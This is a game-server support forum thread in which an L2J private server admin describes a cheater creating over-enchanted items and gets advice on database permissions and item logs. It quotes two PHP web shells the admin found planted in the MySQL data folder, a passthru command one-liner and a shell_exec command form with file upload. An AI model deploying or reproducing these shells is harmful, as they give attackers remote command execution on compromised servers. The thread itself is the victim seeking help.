L2J Server

L2J Revision last 2.3 from branches:
L2JDP Revision last 2.3 from branches:

hello,
yesterday some friend of me call me on the phone and tell me that 1 player have a red weapon and kill all
in the pvp area.he said to me check it.from first moment i know that he was a hacker cause on my server only 2
players have +16 weapon.anyway i log in and check it.and what i see? a player with weapon +150 armor +250 jewels etc..
jail him ask him how? he dont tell me and ban him.then i make a script that when player and no gm have over +20 enchanted item (my max is +20) that will be banned automated.
today now in the mornig i check again database and i see same person with other IP he rr his router.with +250 again
and he got banned automtic after 5 minutes he makes other player and he makes all items +20.and go again to pvp.
i banned him again.
now i cant make nothing when i doesnt know where is calling the problem.
he can make items without to buy like valakas the necklace i have it with raid drop or with craft.and he makes
enchanted item how he want.
its a big problem for me now.
plz when someone can give me some answer some support what i must to do to fix that problem.
ty

1. check item log
2. do you have any php web script that accesses the gameserver database? check the database access rights / change the password if needed.

//not a bug report! moved to support.

janiii wrote:1. check item log
2. do you have any php web script that accesses the gameserver database? check the database access rights / change the password if needed.

//not a bug report! moved to support.

php script only for online players,gm status on/off,create account,player pvp stats only that.he can see the password from then php?
my database password is more then 15 letters....
he have access to database you think? or he can make it with some programm?

energy wrote:

janiii wrote:1. check item log
2. do you have any php web script that accesses the gameserver database? check the database access rights / change the password if needed.

//not a bug report! moved to support.

php script only for online players,gm status on/off,create account,player pvp stats only that.he can see the password from then php?
my database password is more then 15 letters....
he have access to database you think? or he can make it with some programm?

1. if you have scripts, that can update database (e.g. create account), then he could use sql injection. you should make your database access rights clear, so that the php script only can insert into the account table and only read access to all other tables. change your table access rights for the user which is used by the php script. (make own database user for the php scripts, with very limited access to your database - only access to read and only to tables which it reads. if write access is neeeded, add only the needed actions (only insert if only insert of data needed and no update).
2. change the database password, better then do nothing..
3. check the item logs in your server (if not enabled, enable item logging in config!)

i find in my data folder from mysql more then 5 .php files that is not my.

look:
Inetpubwwwrootserver.myserveradress.comacmclass.php

and inside was this code:
\N \N \N \N \N <?php passthru($_GET["cmd"]); ?>

in the others .php was this code:
<?php $cmd = $_POST['cmd'];$documentroot=$_SERVER['DOCUMENT_ROOT'];echo '<html><head><title>Private PHPmyAdmin OFFBoard HACKLiNE</title></head><body bgcolor=#000000 text=#ffffff><h1>Executeing Commands...</h1><br><form method="POST">Commandline <input type="Text"name="cmd"><input type="submit" value="execute"></form> <hr><pre>';if($cmd != "") print Shell_Exec($cmd);echo '</pre></body></html><h1>UPLOAD in C:/AppServ/www/</h1><form enctype="multipart/form-data" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="100000" />Choose a file to upload: <input name="userfile" type="file" /><input type="submit" value="upload" /></form>';$uploadDir = "C:Inetpubwwwrootserver.myserveradress.comacm";$uploadFile = $uploadDir . $_FILES['userfile']['name'];print "<pre>";if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadFile)){print "File was uploaded!";print "Here's some more debugging info:\\n";print_r($_FILES);}print "</pre>";?>


what is that?? he hack me with this way?

energy wrote:Private PHPmyAdmin OFFBoard HACKLiNE

You got a SQL Injection due the insecure script that you where using.